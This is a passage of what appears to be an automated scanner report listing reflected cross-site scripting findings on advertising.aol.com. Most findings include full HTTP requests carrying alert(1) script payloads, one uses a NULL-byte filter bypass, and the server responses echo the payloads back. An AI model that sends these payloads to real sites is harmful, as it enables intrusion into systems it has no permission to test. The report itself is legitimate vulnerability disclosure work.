User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:30:02 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:30:02 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13368

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/3d8b9"-alert(1)-"6eecb609471/7/4/1/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advertising.aol
...[SNIP]...
4.58. http://advertising.aol.com/finish/7/4/1/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/7/4/1/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5bf03"><script>alert(1)</script>3eb5e78913b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /5bf03"><script>alert(1)</script>3eb5e78913b/7/4/1/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:29:58 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:29:58 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13438

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/5bf03"><script>alert(1)</script>3eb5e78913b/7/4/1/" />
...[SNIP]...
4.59. http://advertising.aol.com/finish/8/4/1/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/8/4/1/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bccd4"-alert(1)-"20d13911a60 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bccd4"-alert(1)-"20d13911a60/8/4/1/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:29:46 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:29:46 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13368

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/bccd4"-alert(1)-"20d13911a60/8/4/1/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advertising.aol
...[SNIP]...
4.60. http://advertising.aol.com/finish/8/4/1/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/8/4/1/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17768"><script>alert(1)</script>d9ef3f9913f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /17768"><script>alert(1)</script>d9ef3f9913f/8/4/1/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:29:43 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:29:43 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13438

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/17768"><script>alert(1)</script>d9ef3f9913f/8/4/1/" />
...[SNIP]...
4.61. http://advertising.aol.com/nai/nai.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /nai/nai.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f67fb"><script>alert(1)</script>c3e09f6c64d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /naif67fb"><script>alert(1)</script>c3e09f6c64d/nai.php?action_id=3 HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:44:49 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:44:49 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13502

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/naif67fb"><script>alert(1)</script>c3e09f6c64d/nai.php?action_id=3" />
...[SNIP]...
4.62. http://advertising.aol.com/nai/nai.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /nai/nai.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 88df7"-alert(1)-"dba33f7ee0e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nai88df7"-alert(1)-"dba33f7ee0e/nai.php?action_id=3 HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:44:52 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:44:52 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13432

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai88df7"-alert(1)-"dba33f7ee0e/nai.php?action_id=3";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,ad
...[SNIP]...
4.63. http://advertising.aol.com/nai/nai.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /nai/nai.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6a107"-alert(1)-"5790374bb49 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nai/nai.php6a107"-alert(1)-"5790374bb49?action_id=3 HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:45:03 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:45:03 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13432

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
i('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai/nai.php6a107"-alert(1)-"5790374bb49?action_id=3";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advertisin
...[SNIP]...
4.64. http://advertising.aol.com/nai/nai.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /nai/nai.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c40c6"><script>alert(1)</script>dfa626667ea was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nai/nai.phpc40c6"><script>alert(1)</script>dfa626667ea?action_id=3 HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:45:00 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:45:00 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13502

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/nai/nai.phpc40c6"><script>alert(1)</script>dfa626667ea?action_id=3" />
...[SNIP]...
4.65. http://advertising.aol.com/nai/nai.php [action_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /nai/nai.php

Issue detail

The value of the action_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload %0060c4f'><script>alert(1)</script>607e346f05e was submitted in the action_id parameter. This input was echoed as 60c4f'><script>alert(1)</script>607e346f05e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /nai/nai.php?action_id=3%0060c4f'><script>alert(1)</script>607e346f05e HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:44:14 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Content-Type: text/html
Content-Length: 13896


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script>

   // dynamic variables
   var numFrames = 9;
   var redirectUrlNoCookie = "http://www.networkadvertising.org/verify/no_cookie.gif";
   var redire
...[SNIP]...
<iframe id='frame_0' src='http://nai.advertising.com/nai/daa.php?action_id=3.60c4f'><script>alert(1)</script>607e346f05e&participant_id=0&rd=http%3A%2F%2Fadvertising.aol.com&nocache=8281580' height='1' width='1'>
...[SNIP]...
4.66. http://advertising.aol.com/token/0/2/1812733584/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/0/2/1812733584/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bfbdd"-alert(1)-"56c415e6812 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bfbdd"-alert(1)-"56c415e6812/0/2/1812733584/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:15:30 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:15:30 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13404

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/bfbdd"-alert(1)-"56c415e6812/0/2/1812733584/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advert
...[SNIP]...
4.67. http://advertising.aol.com/token/0/2/1812733584/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/0/2/1812733584/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b81e"><script>alert(1)</script>15b2c30d857 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /7b81e"><script>alert(1)</script>15b2c30d857/0/2/1812733584/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:15:27 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:15:27 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13474

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/7b81e"><script>alert(1)</script>15b2c30d857/0/2/1812733584/" />
...[SNIP]...
4.68. http://advertising.aol.com/token/0/3/295357155/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/0/3/295357155/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4c934"-alert(1)-"95baf5a60d2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /4c934"-alert(1)-"95baf5a60d2/0/3/295357155/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:48:59 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:48:59 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13400

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
